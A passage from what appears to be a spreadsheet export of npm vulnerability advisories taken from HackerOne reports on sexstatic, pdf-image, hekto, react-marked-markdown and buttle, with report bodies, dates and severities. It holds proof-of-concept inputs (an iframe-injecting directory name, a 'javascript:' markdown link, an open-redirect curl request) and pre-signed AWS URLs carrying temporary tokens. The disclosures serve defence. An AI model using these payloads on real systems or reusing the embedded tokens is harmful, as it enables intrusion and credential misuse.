src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/274/226/6c086ce3cc705e50964282ec247d7cd9b5e905f1/sexstatic_xss_1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIFUA5MSDI66KW5XA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDIIHfzqjWGgOddDrOCK3A2idI%2BbZfsMDl3lwr5jdUjH2BaUaGDKWWtgxjcMYsP%2BGTIa1K4lEyrd%2B1sR1kDGQwCkOK3zD7hzLSaiArqdwaAtF%2FnaT7ivXhsjcNlMhvfLoRuJRT%2BdwCSMWvgD08rySEggBRZHdhvQ9JY1U0PYjv7DHUDK%2FWkgqN0hgH%2FTB41ceFwsNqM%2BxYaiWi3PQqv0D2JA2udMzfboOgNGUNtvpcrxR3moFfC6pQIJx0q24hx7qntVhq3JgbRSg9d103%2BuVM9uzEl%2Fuh3IgOtzNkN7QVE5agNKGRBWXmzrjmrt0O%2B1x2J2AnC07%2FfOCHOrBsd3JmnXUED%2FPcofkmV36uKXeYlPzMCL5tA%2Bb%2FETHQyaXtYKLmRQgTUnpf9uGvgY7%2Btlc6BXg1v8wr2dHgjuK6ZG39nxv780vJlwlaF%2FdhnTo2bY3co36fFN98oYJi3zQRttqczZhf%2FyXzP5UnvQz9hJ%2FDQyOx3hkAJJjw5BYs%2FAeeTzl3sHbZoXPYPs3UfKqNIyvEJ0lCrwOC%2F%2BAcU%2BNeMG279sVplrJu%2BIyXS1uA2qa7%2F6imnRQlbLh6iGQTwK5ID%2B3GX3PUeu398QouMHs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=0e9435a1608b2c3aa1d10b3b7eb5a0ffa054f19616e8152ed0847888dfe924ce" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;now, click on &lt;code&gt;&amp;quot;&amp;gt;&amp;lt;iframe src=&amp;quot;malware_frame.html&amp;quot;&amp;gt;/&lt;/code&gt; directory name on the files list&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;malicious JavaScript code from &lt;code&gt;malware_frame.html&lt;/code&gt; file is executed immediately:&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="sexstatic_xss.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/274/225/760e2eda64a6eb3818eaaaf7bac420bbe6e120d3/sexstatic_xss.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIFUA5MSDI66KW5XA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDIIHfzqjWGgOddDrOCK3A2idI%2BbZfsMDl3lwr5jdUjH2BaUaGDKWWtgxjcMYsP%2BGTIa1K4lEyrd%2B1sR1kDGQwCkOK3zD7hzLSaiArqdwaAtF%2FnaT7ivXhsjcNlMhvfLoRuJRT%2BdwCSMWvgD08rySEggBRZHdhvQ9JY1U0PYjv7DHUDK%2FWkgqN0hgH%2FTB41ceFwsNqM%2BxYaiWi3PQqv0D2JA2udMzfboOgNGUNtvpcrxR3moFfC6pQIJx0q24hx7qntVhq3JgbRSg9d103%2BuVM9uzEl%2Fuh3IgOtzNkN7QVE5agNKGRBWXmzrjmrt0O%2B1x2J2AnC07%2FfOCHOrBsd3JmnXUED%2FPcofkmV36uKXeYlPzMCL5tA%2Bb%2FETHQyaXtYKLmRQgTUnpf9uGvgY7%2Btlc6BXg1v8wr2dHgjuK6ZG39nxv780vJlwlaF%2FdhnTo2bY3co36fFN98oYJi3zQRttqczZhf%2FyXzP5UnvQz9hJ%2FDQyOx3hkAJJjw5BYs%2FAeeTzl3sHbZoXPYPs3UfKqNIyvEJ0lCrwOC%2F%2BAcU%2BNeMG279sVplrJu%2BIyXS1uA2qa7%2F6imnRQlbLh6iGQTwK5ID%2B3GX3PUeu398QouMHs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=7d5b562d2efef49e0e92659c77ab38a4229c07cef417ec99c93f8e89fddfedea" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/274/225/760e2eda64a6eb3818eaaaf7bac420bbe6e120d3/sexstatic_xss.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIFUA5MSDI66KW5XA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDIIHfzqjWGgOddDrOCK3A2idI%2BbZfsMDl3lwr5jdUjH2BaUaGDKWWtgxjcMYsP%2BGTIa1K4lEyrd%2B1sR1kDGQwCkOK3zD7hzLSaiArqdwaAtF%2FnaT7ivXhsjcNlMhvfLoRuJRT%2BdwCSMWvgD08rySEggBRZHdhvQ9JY1U0PYjv7DHUDK%2FWkgqN0hgH%2FTB41ceFwsNqM%2BxYaiWi3PQqv0D2JA2udMzfboOgNGUNtvpcrxR3moFfC6pQIJx0q24hx7qntVhq3JgbRSg9d103%2BuVM9uzEl%2Fuh3IgOtzNkN7QVE5agNKGRBWXmzrjmrt0O%2B1x2J2AnC07%2FfOCHOrBsd3JmnXUED%2FPcofkmV36uKXeYlPzMCL5tA%2Bb%2FETHQyaXtYKLmRQgTUnpf9uGvgY7%2Btlc6BXg1v8wr2dHgjuK6ZG39nxv780vJlwlaF%2FdhnTo2bY3co36fFN98oYJi3zQRttqczZhf%2FyXzP5UnvQz9hJ%2FDQyOx3hkAJJjw5BYs%2FAeeTzl3sHbZoXPYPs3UfKqNIyvEJ0lCrwOC%2F%2BAcU%2BNeMG279sVplrJu%2BIyXS1uA2qa7%2F6imnRQlbLh6iGQTwK5ID%2B3GX3PUeu398QouMHs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=7d5b562d2efef49e0e92659c77ab38a4229c07cef417ec99c93f8e89fddfedea" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="patch"&gt;Patch&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;pathname&lt;/code&gt; used in HTML output can be sanitized with the same &lt;code&gt;he.encode()&lt;/code&gt; function, as it is already done for every filename.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Operating system: Ubuntu 16.04&lt;/li&gt;
&lt;li&gt;Node.js 8.9.4&lt;/li&gt;
&lt;li&gt;npm v. 5.6.0&lt;/li&gt;
&lt;li&gt;Chromium  67.0.3367.0 (Developer Build) (64-bit)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="wrap-up"&gt;Wrap up&lt;/h2&gt;
&lt;p&gt;I hope my report will help keeping Node.js Ecosystem users safe :)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: [N] &lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: [N] &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Malicious user is able to inject iframe element with malicious JavaScript code via crafted directory name and trick users to open this directory in the browser.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-21T13:44:51.253Z</t>
  </si>
  <si>
    <t>2018-05-29T10:46:52.680Z</t>
  </si>
  <si>
    <t>sexstatic can be used as static file server and presents directory index in the browser. Output is correctly sanitized against any attempts of HTML or JavaScript injection, due to sanitization done in sexstatic/lib/sexstatic/showdir.js:</t>
  </si>
  <si>
    <t>Malicious user is able to inject iframe element with malicious JavaScript code via crafted directory name and trick users to open this directory in the browser.</t>
  </si>
  <si>
    <t xml:space="preserve">report HTML Injection vulnerability sexstatic module. possible use HTML directory names, lead run arbitrary JavaScript code browser.  Module  module name  sexstatic version  0.6.2 npm page  https //www.npmjs.com/package/sexstatic  Module Description  simple static file server middleware. Use raw http server, express/connect, flatiron/union   adds ability arbitrarily modify output HTML whatever reason. adding additional  simple url    string handlers simple url    function handlers  wanna i"m talking  may may not extend further addons future suit needs.  Module Stats  Stats 4 downloads last day 29 downloads last week 158 downloads last month  Vulnerability Description  sexstatic used static file server presents directory index browser. Output correctly sanitized against attempts HTML JavaScript injection, due sanitization done sexstatic/lib/sexstatic/showdir.js  // sexstatic/lib/sexstatic/showdir.js, line 132      var displayName = he.encode(file[0]) + ((isDir)? "/" "");      // TODO  use stylessheets?     html += "" +         "(" + permsToString(file[1]) + ")" +         "" + sizeToString(file[1], humanReadable, si) + "" +         "" + displayName + "" +         " n";  However, sanitization missing part  // sexstatic/lib/sexstatic/showdir.js, line 106          var html = [         "",         "",         "  ",         "    ",         "    Index " + pathname +"",         "  ",         "  ",         "Index " + pathname + ""         ].join(" n") + " n";  pathname variable used without sanitization. allows malicious user use valid HTML code directory name.  Below present complete attack scenario vulnerability.  Steps Reproduce    install sexstatic module   $ npm install sexstatic   directory will used root sexstatic, create directory following name  Â« Â» /  created directory, create file malware_frame.html following content                Frame embeded malware downloader  P        iframe element malicious code              alert("Uh oh, bad, bad malware   ")           run sexstatic   $ ./node_modules/sexstatic/lib/sexstatic.js  p 8080 sexstatic serving /home/rafal.janicki/playground/hackerone/Node http //0.0.0.0 8080    go http //localhost 8080 directory index       now, click Â« Â» / directory name files list malicious JavaScript code malware_frame.html file executed immediately      Patch  pathname used HTML output sanitized he.encode() function, already done every filename.  Supporting Material/References    Operating system  Ubuntu 16.04 8.9.4 npm v. 5.6.0 Chromium  67.0.3367.0 (Developer Build) (64 bit)   Wrap  hope report will help keeping Ecosystem users safe  )   contacted maintainer let know  [N]  opened issue related repository  [N]    Regards,  Rafal "bl4de" Janicki  Impact  Malicious user able inject iframe element malicious JavaScript code via crafted directory name trick users open directory browser. </t>
  </si>
  <si>
    <t>Malicious user able inject iframe element malicious JavaScript code via crafted directory name trick users open directory browser.</t>
  </si>
  <si>
    <t>Command injection in 'pdf-image'</t>
  </si>
  <si>
    <t>/advisories/670</t>
  </si>
  <si>
    <t>2018-06-01T22:07:38.878+00:00</t>
  </si>
  <si>
    <t>pdf-image</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pdf-image</t>
  </si>
  <si>
    <t>&lt;2.0.0</t>
  </si>
  <si>
    <t>&gt;=2.0.0</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/340208.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report command injection in pdf-image&lt;br&gt;
It allows executing commands on the server &lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; pdf-image&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.0.5&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/pdf-image&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Provides an interface to convert PDF&amp;#39;s pages to png files in Node.js by using ImageMagick.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;[2013] downloads in the last week&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Description about how the vulnerability was found and how it can be exploited, how it harms package users (data modification/lost, system access, other.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;The constructGetInfoCommand would be initializing the command that is to the passed to &amp;#39;exec&amp;#39; of getInfo(). The user input is not getting validated in #L26 of constructGetInfoCommand and it leads to command injection in #L43.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a title="https://github.com/mooz/node-pdf-image/blob/master/index.js#L26" href="/redirect?signature=779ff3cff11e9e9ab89a02f7e9e0f3b42c89605e&amp;amp;url=https%3A%2F%2Fgithub.com%2Fmooz%2Fnode-pdf-image%2Fblob%2Fmaster%2Findex.js%23L26" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/mooz/node-pdf-image/blob/master/index.js#L26&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;br&gt;
&lt;a title="https://github.com/mooz/node-pdf-image/blob/master/index.js#L43%23%23" href="/redirect?signature=5f0e656d096dc4d9fd4a583f4a71a96d73d01974&amp;amp;url=https%3A%2F%2Fgithub.com%2Fmooz%2Fnode-pdf-image%2Fblob%2Fmaster%2Findex.js%23L43%2523%2523" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/mooz/node-pdf-image/blob/master/index.js#L43%23%23&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt; Patch&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;State all technical information about the stack where the vulnerability was found&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Kali linux &lt;/li&gt;
&lt;li&gt;Nodejs v8.10.0&lt;/li&gt;
&lt;li&gt;Npm v5.8.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;An attacker could execute arbitrary shell commands&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-04-18T18:24:40.746Z</t>
  </si>
  <si>
    <t>2018-05-29T20:43:43.830Z</t>
  </si>
  <si>
    <t xml:space="preserve">
Description about how the vulnerability was found and how it can be exploited, how it harms package users (data modification/lost, system access, other.
</t>
  </si>
  <si>
    <t>An attacker could execute arbitrary shell commands</t>
  </si>
  <si>
    <t xml:space="preserve">report command injection pdf image allows executing commands server   Module  module name  pdf image version  1.0.5 npm page  https //www.npmjs.com/package/pdf image  Module Description   Provides interface convert PDF"s pages png files using ImageMagick.   Module Stats  [2013] downloads last week  Vulnerability  Vulnerability Description   Description vulnerability found exploited, harms package users (data modification/lost, system access, other.   Steps Reproduce    constructGetInfoCommand initializing command passed "exec" getInfo(). user input not getting validated #L26 constructGetInfoCommand leads command injection #L43.   https //github.com/mooz/node pdf image/blob/master/index.js#L26 https //github.com/mooz/node pdf image/blob/master/index.js#L43%23%23 Patch  Supporting Material/References    State technical information stack vulnerability found    Kali linux  Nodejs v8.10.0 Npm v5.8.0   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  attacker execute arbitrary shell commands </t>
  </si>
  <si>
    <t>attacker execute arbitrary shell commands</t>
  </si>
  <si>
    <t>[hekto] open redirect when target domain name is used as html filename on server</t>
  </si>
  <si>
    <t>/advisories/669</t>
  </si>
  <si>
    <t>2018-05-22T23:44:04.251+00:00</t>
  </si>
  <si>
    <t>hekto</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hekto</t>
  </si>
  <si>
    <t>&lt;=0.2.3</t>
  </si>
  <si>
    <t>&gt;=0.2.4</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/320693.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi,&lt;/p&gt;
&lt;p&gt;There is an open redirect in hekto when target domain name is used as html filename on server.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; hekto&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.2.3&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/hekto&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;p&gt;This package exposes a directory and its children to create, read, update, and delete operations over http.&lt;/p&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;[0] downloads in the last day&lt;br&gt;
[21] downloads in the last week&lt;br&gt;
[216] downloads in the last month&lt;/p&gt;
&lt;p&gt;~[2600] estimated downloads per year&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;When processing extensionless html, hekto launches a redirection.&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;//https://github.com/herber/hekto/blob/master/bin/hekto.js#L184
      // Add trailing slash for extensionless html.
      if (fs.existsSync(file + &amp;#39;.html&amp;#39;) &amp;amp;&amp;amp; fs.lstatSync(file + &amp;#39;.html&amp;#39;).isFile()) {
        this.status = 307;
        this.redirect(this.request.url + &amp;#39;/&amp;#39; + query);
        return ;
      }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For example, if there is a file named &amp;quot;hackerone.com.html&amp;quot; in document root dir, accessing &lt;code&gt;http://&amp;lt;server&amp;gt;/hackerone.com&lt;/code&gt; will leads to a redirection to &lt;code&gt;http://&amp;lt;server&amp;gt;/hackerone.com/&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;But when accessing &lt;code&gt;http://&amp;lt;server&amp;gt;//hackerone.com&lt;/code&gt;, the server would redirect ro &lt;code&gt;//hackerone.com&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;install hekto module&lt;br&gt;
&lt;code&gt;$ npm install hekto&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;create a file named &lt;code&gt;hackerone.com.html&lt;/code&gt;&lt;br&gt;
&lt;code&gt;$ touch hackerone.com.html&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;run server from command line&lt;br&gt;
&lt;code&gt;$ ./node_modules/hekto/bin/hekto.js serve&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;test redirection&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -i http://127.0.0.1:3000//hackerone.com
HTTP/1.1 307 Temporary Redirect
Vary: Accept-Encoding
X-Powered-By: Hekto
Location: //hackerone.com/
Content-Type: text/html; charset=utf-8
Content-Length: 63
Date: Wed, 28 Feb 2018 08:22:31 GMT
Connection: keep-alive
Redirecting to &amp;lt;a href=&amp;quot;//hackerone.com/&amp;quot;&amp;gt;//hackerone.com/&amp;lt;/a&amp;gt;.
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;State all technical information about the stack where the vulnerability was found&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;macOS 10.13.3&lt;/li&gt;
&lt;li&gt;Node.js v9.6.1&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: [N] &lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: [N]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;This vulnerability can be used to phishing attacks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-28T08:25:04.122Z</t>
  </si>
  <si>
    <t>2018-05-20T08:45:37.538Z</t>
  </si>
  <si>
    <t>When processing extensionless html, hekto launches a redirection.</t>
  </si>
  <si>
    <t>This vulnerability can be used to phishing attacks</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  open redirect hekto when target domain name used html filename server.  Module  module name  hekto version  0.2.3 npm page  https //www.npmjs.com/package/hekto  Module Description  package exposes directory its children create, read, update, delete operations http.  Module Stats  [0] downloads last day [21] downloads last week [216] downloads last month  ~[2600] estimated downloads per year  Vulnerability  Vulnerability Description  When processing extensionless html, hekto launches redirection. //https //github.com/herber/hekto/blob/master/bin/hekto.js#L184       // Add trailing slash extensionless html.       (fs.existsSync(file + ".html") &amp;amp;&amp;amp; fs.lstatSync(file + ".html").isFile()) {         = 307;         this.redirect(this.request.url + "/" + query);          return ;       }  example, file named Â« Â»hackerone.com.htmlÂ« Â» document root dir, accessing http ///hackerone.com will leads redirection http ///hackerone.com/.  when accessing http ////hackerone.com, server redirect ro //hackerone.com.  Steps Reproduce    install hekto module $ npm install hekto create file named $ touch run server command line $ ./node_modules/hekto/bin/hekto.js serve test redirection  $ curl  http //127.0.0.1 3000//hackerone.com HTTP/1.1 307 Temporary Redirect Vary  Accept Encoding X Powered  Hekto Location  //hackerone.com/ Content Type  text/html; charset=utf 8 Content Length  63 Date  Wed, 28 Feb 2018 08 22 31 GMT Connection  keep alive  Redirecting //hackerone.com/.  Supporting Material/References    State technical information stack vulnerability found    macOS 10.13.3 v9.6.1 npm 5.6.0 curl 7.54.0   Wrap   contacted maintainer let know  [N]  opened issue related repository  [N]   Impact  vulnerability used phishing attacks </t>
  </si>
  <si>
    <t>vulnerability used phishing attacks</t>
  </si>
  <si>
    <t>The react-marked-markdown module allows XSS injection in href values.</t>
  </si>
  <si>
    <t>/advisories/668</t>
  </si>
  <si>
    <t>2018-05-17T20:45:00.776+00:00</t>
  </si>
  <si>
    <t>react-marked-markdown</t>
  </si>
  <si>
    <t>https://www.npmjs.com/react-marked-markdown</t>
  </si>
  <si>
    <t>Critical</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/344069.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
&lt;p&gt;NOTE! Thanks for submitting a report! Please replace &lt;em&gt;all&lt;/em&gt; the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I would like to report XSS in react-marked-markdown.&lt;br&gt;
The react-marked-markdown module incorrectly sanitizes href values and allows arbitrary code injection (XSS) via user provided Markdown.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; react-marked-markdown&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.4.6&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/1.4.6&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;p&gt;A react components package that helps you use Markdown easily.&lt;/p&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Replace stats below with numbers from npmâ€™s module page:&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;133 downloads in the last day&lt;br&gt;
935 downloads in the last week&lt;br&gt;
4207 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;The React component created with react-marked-markdown contains XSS in link values even when the sanitize option is set to true.&lt;/p&gt;
&lt;p&gt;The react-marked-markdown module uses marked.Render() but overwrites the link method with a custom version that doesn&amp;#39;t correctly escape values passed to the href prop of anchor components.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;import React from &amp;#39;react&amp;#39;&lt;br&gt;
import ReactDOM from &amp;#39;react-dom&amp;#39;&lt;br&gt;
import { MarkdownPreview } from &amp;#39;react-marked-markdown&amp;#39;&lt;/p&gt;
&lt;p&gt;ReactDOM.render(&lt;br&gt;
  &amp;lt;MarkdownPreview&lt;br&gt;
    markedOptions={{ sanitize: true }}&lt;br&gt;
    value={&amp;#39;[XSS](javascript: alert`1`)&amp;#39;}&lt;br&gt;
  /&amp;gt;,&lt;br&gt;
  document.getElementById(&amp;#39;root&amp;#39;)&lt;br&gt;
)&lt;/p&gt;
&lt;h2 id="patch"&gt;Patch&lt;/h2&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;State all technical information about the stack where the vulnerability was found&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;macOS 10.13&lt;/li&gt;
&lt;li&gt;Node.js 8.11.1&lt;/li&gt;
&lt;li&gt;npm 6.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;Select Y or N for the following statements:&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: Y &lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: Y &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a title="https://github.com/Vincent-P/react-marked-markdown/issues/61" href="/redirect?signature=4e524be44de0cea5e1ba5f1ba36e34903a384de3&amp;amp;url=https%3A%2F%2Fgithub.com%2FVincent-P%2Freact-marked-markdown%2Fissues%2F61" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/Vincent-P/react-marked-markdown/issues/61&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. This allows attackes to add malicious scripts to the page via Markdown.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-04-27T19:35:19.912Z</t>
  </si>
  <si>
    <t>2018-05-13T17:11:10.683Z</t>
  </si>
  <si>
    <t>The React component created with react-marked-markdown contains XSS in link values even when the sanitize option is set to true.</t>
  </si>
  <si>
    <t>The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. This allows attackes to add malicious scripts to the page via Markdown.</t>
  </si>
  <si>
    <t xml:space="preserve"> NOTE  Thanks submitting report  Please replace [square] sections below pertinent details. Remember, detail provide, easier us triage respond quickly, so sure time filling report    report XSS react marked markdown. react marked markdown module incorrectly sanitizes href values allows arbitrary code injection (XSS) via user provided Markdown.  Module  module name  react marked markdown version  1.4.6 npm page  https //www.npmjs.com/package/1.4.6  Module Description  react components package helps use Markdown easily.  Module Stats   Replace stats below numbers npmâ€™s module page    133 downloads last day 935 downloads last week 4207 downloads last month  Vulnerability  Vulnerability Description  React component created react marked markdown contains XSS link values even when sanitize option set true.  react marked markdown module uses marked.Render() overwrites link method custom version doesn"t correctly escape values passed href prop anchor components.  Steps Reproduce   import React "react" import ReactDOM "react dom" import { MarkdownPreview } "react marked markdown"  ReactDOM.render(   ,   document.getElementById("root") )  Patch  Supporting Material/References    State technical information stack vulnerability found    macOS 10.13 8.11.1 npm 6.0   Wrap   Select Y N following statements     contacted maintainer let know  Y  opened issue related repository  Y    https //github.com/Vincent P/react marked markdown/issues/61  Impact  software does not neutralize incorrectly neutralizes user controllable input placed output used web page served users. allows attackes add malicious scripts page via Markdown. </t>
  </si>
  <si>
    <t>software does not neutralize incorrectly neutralizes user-controllable input placed output used web page served users. allows attackes add malicious scripts page via Markdown.</t>
  </si>
  <si>
    <t>[buttle] Remote Command Execution via unsanitized PHP filename when it's run with --php-bin flag</t>
  </si>
  <si>
    <t>/advisories/667</t>
  </si>
  <si>
    <t>2018-05-16T20:00:53.343+00:00</t>
  </si>
  <si>
    <t>buttle</t>
  </si>
  <si>
    <t>https://www.npmjs.com/buttle</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/331032.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report Remote Code Execution in buttle module.&lt;/p&gt;
&lt;p&gt;When buttle is run with &lt;code&gt;--php-bin&lt;/code&gt; option (to handle PHP), the PHP filename is not sanitized and allows to inject shell commands.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; buttle&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.2.0&lt;br&gt;
